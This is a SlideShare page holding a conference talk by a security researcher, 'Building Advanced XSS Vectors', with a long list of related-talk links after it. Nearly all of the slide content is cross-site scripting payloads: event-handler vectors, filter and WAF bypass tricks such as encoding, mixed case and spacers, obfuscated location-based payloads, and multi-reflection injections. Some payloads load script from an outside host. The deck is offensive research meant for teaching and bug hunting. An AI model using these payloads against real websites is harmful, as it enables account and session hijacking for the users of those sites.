SlideShare a Scribd company logo

Building Advanced XSS Vectors

R
Rodolfo Assis (Brute)

XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog

Technology
1 of 61
Download to read offline
Building Advanced XSS Vectors by @brutelogic
About
About - Agenda ● About ● Vector Scheme ● Vector Builder (webGun) ● Agnostic Event Handlers ● Reusing Native Code ● Filter Bypass ● Location Based Payloads ● Multi Reflection
About - Speaker ● Security researcher @sucurisecurity ● Former #1 @openbugbounty ● Some HoF & acknowledgements ● XSS expert
About - Presentation ● Not just another talk on XSS ● Use of alert(1) for didactic purposes ● Mainly about event based XSS ● Some stuff may be hard to follow
Vector Scheme
Vector Scheme ● Regular <tag handler=code> Example: <svg onload=alert(1)>
Vector Scheme ● Full extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3 Example: <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt (1)%09><td>AAAAAAAAA
Vector Builder (webGun) http://brutelogic.com.br/webgun
Vector Builder (webGun) ● Interactive cheat sheet ● Builder of XSS vectors/payloads ● More than 3k unique combinations ● Event or tag oriented ● Handlers by browser ● Handlers by length* ● Manual vector editing ● Test on target or default test page * for filter bypass procedure.
Agnostic Event Handlers
Agnostic Event Handlers ● Used with almost any tag ● Ones that work with arbitrary tags Example: <brute ● Most require UI ● Work on all major browsers
Agnostic Event Handlers - List ● onblur ● onclick ● oncopy ● oncontextmenu ● oncut ● ondblclick ● ondrag ● onfocus ● oninput ● onkeydown ● onkeypress ● onkeyup ● onmousedown ● onmousemove ● onmouseout ● onmouseover ● onmouseup ● onpaste
Agnostic Event Handlers ● Example: <brute onclick=alert(1)>clickme!
Reusing Native Code
Reusing Native Code ● Example 1 ...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script> ● INPUT "><script>alert(1)// or "><script>alert(1)<!--
Reusing Native Code ● Injection ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script> ● Result ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script>
Reusing Native Code ● Example 2 … <input type="hidden" value="INPUT" > </form> <script type="text/javascript"> function x() { do something } </script> ● INPUT "><script src="//brutelogic.com.br/1 or "><script src="//3334957647/1
Reusing Native Code ● Injection … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script> ● Result … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script>
Filter Bypass
Filter Bypass - Procedure ● Arbitrary tag + fake handler ● Start with 5 chars, increase ● Example <x onxxx=1 (5) pass <x onxxxx=1 (6) pass <x onxxxxx=1 (7) block Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow
Filter Bypass - Tricks ● Encoding %3Cx onxxx=1 <%78 onxxx=1 <x %6Fnxxx=1 <x o%6Exxx=1 <x on%78xx=1 <x onxxx%3D1 ● Mixed Case <X onxxx=1 <x ONxxx=1 <x OnXxx=1 <X OnXxx=1 ● Doubling <x onxxx=1 onxxx=1
Filter Bypass - Tricks ● Spacers <x/onxxx=1 <x%09onxxx=1 <x%0Aonxxx=1 <x%0Conxxx=1 <x%0Donxxx=1 <x%2Fonxxx=1 ● Combo <x%2F1=">%22OnXxx%3D1 ● Quotes <x 1='1'onxxx=1 <x 1="1"onxxx=1 ● Mimetism <x </onxxx=1 (closing tag) <x 1=">" onxxx=1 (text outside tag) <http://onxxx%3D1/ (URL)
Location Based Payloads
Location Based Payloads ● Really complex payloads can be built ● document.location properties and similar ● Avoiding special chars (at least between = and >) ● Game over to filter
Location Based Payloads - Document Properties ● location.protocol protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.hostname, document.domain protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.origin protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.pathname protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.search protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● previousSibling.nodeValue, document.body.textContent* ("Before") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● tagName, nodeName ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● outerHTML ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● innerHTML* ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild. nodeValue ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● Location.hash ("Hash") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● URL, location.href, baseURI, documentURI protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Evolution 1 <svg onload=location='javascript:alert(1)'> <svg onload=location=location.hash.substr(1)>#javascript:alert(1) <svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/. source+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/. source+location.hash[1]+1+location.hash[2]>#()
Location Based Payloads - Evolution 2 <javascript onclick=alert(tagName)>click me! <javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So... <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) javascript + :"click me! + #"-alert(1) javascrip + t:"click me! + #"-alert(1) javas + cript:"click me! + #"-alert(1)
Location Based Payloads - Taxonomy ● By Type 1. Location 2. Location Self 3. Location Self Plus ● By Positioning (Properties) Before < Itself > After # Hash Inside
Location Based Payloads - Location ● Location After (innerHTML) <j onclick=location=innerHTML>javascript&colon;alert(1)// ● Location Inside (name+id) <svg id=t:alert(1) name=javascrip onload=location=name+id>
Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+location.hash) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'- alert(1) <javascript onclick=location=tagName+innerHTML+URL>:"-'click me! </javascript>#'-alert(1) Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)
Location Based Payloads - Location ● Location Itself + Hash (tagName+URL) <javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1) (“Labeled Jump”) <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1) Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#% 0Aalert(1)
Location Based Payloads - Location ● Location After + Hash (innerHTML+URL) <j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1) <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+URL) <javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'- alert(1) <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
Location Based Payloads - Location ● Location Itself + Before (tagName+previousSibling) "-alert(9)<javascript:" onclick=location=tagName+previousSibling. nodeValue>click me! ● Location Itself + After + Before (tagName+innerHTML+previousSibling) '-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling. nodeValue>cript:'click me!
Location Based Payloads - Location ● Location After + Itself (innerHTML+outerHTML) <alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me! */</alert(1)<!-- --> javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- --> <j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript: /*click me! javascript:/*click me! + <j 1="*/""-alert(1)<!-- …
Location Based Payloads - Location ● Location After + Before + Itself (innerHTML+previousSibling+outerHTML) */"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j"-alert(9)<!-- ... */"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j 1="-alert(9)//" ...
Location Based Payloads - Location Self ● Location Self Inside p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id> http://...?p=<svg/onload=alert(1)+ p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id> http://...?p=<script/src=//brutelogic.com.br/1+
Location Based Payloads - Location Self ● Location Self After p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)> http://...?p=<svg/onload=alert(1)>
Location Based Payloads - Location Self Plus ● Location Self Plus Itself p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me! http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location% 2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=" location+=outerHTML">
Location Based Payloads - Location Self Plus ● Location Self Plus After p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)> http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt; svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
Location Based Payloads - Location Self Plus ● Location Self Plus Before p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body. textContent>click me! http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location% 2B=document.body.textContent%3Eclick%20me![BODY_CONTENT] &p=<svg/onload=alert(1)>click me!
Multi Reflection
Multi Reflection - Single Input ● Double Reflection - Single Input p='onload=alert(1)><svg/1=' 'onload=alert(1)><svg/1=' … [code] … 'onload=alert(1)><svg/1=' ● Double Reflection - Single Input (script) p=’>alert(1)</script><script/1=’ p=*/alert(1)</script><script>/* */alert(1)</script><script>/* … [code] … */alert(1)</script><script>/*
Multi Reflection - Single Input ● Triple Reflection - Single Input p=*/alert(1)">'onload="/*<svg/1=' p=`-alert(1)">'onload="`<svg/1=' `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' ● Triple Reflection - Single Input (script) p=*/</script>'>alert(1)/*<script/1=' */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1='
Multi Reflection - Multi Input ● 2 inputs: p=<svg/1='&q='onload=alert(1)> ● 3 inputs: p=<svg 1='&q=onload='/*&r=*/alert(1)'>
Conclusion ● XSS vectors can: - be complex; - easily evade filters; - blow your mind.
Thanks! @brutelogic

Recommended

Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 

Recommended

Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 

More Related Content

What's hot

Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 

What's hot (20)

Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang Bhatnagar
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 

Viewers also liked

The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick GalbreathCODE BLUE
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
JavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrimeJavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrimeNishant Das Patnaik
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Pengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDKPengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDKMuhammad Yusuf
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionBart Leppens
 
{{more}} Kibana4
{{more}} Kibana4{{more}} Kibana4
{{more}} Kibana4琛琳 饶
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012_mr_me
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)__x86
 
Apache安装配置mod security
Apache安装配置mod securityApache安装配置mod security
Apache安装配置mod securityHuang Toby
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
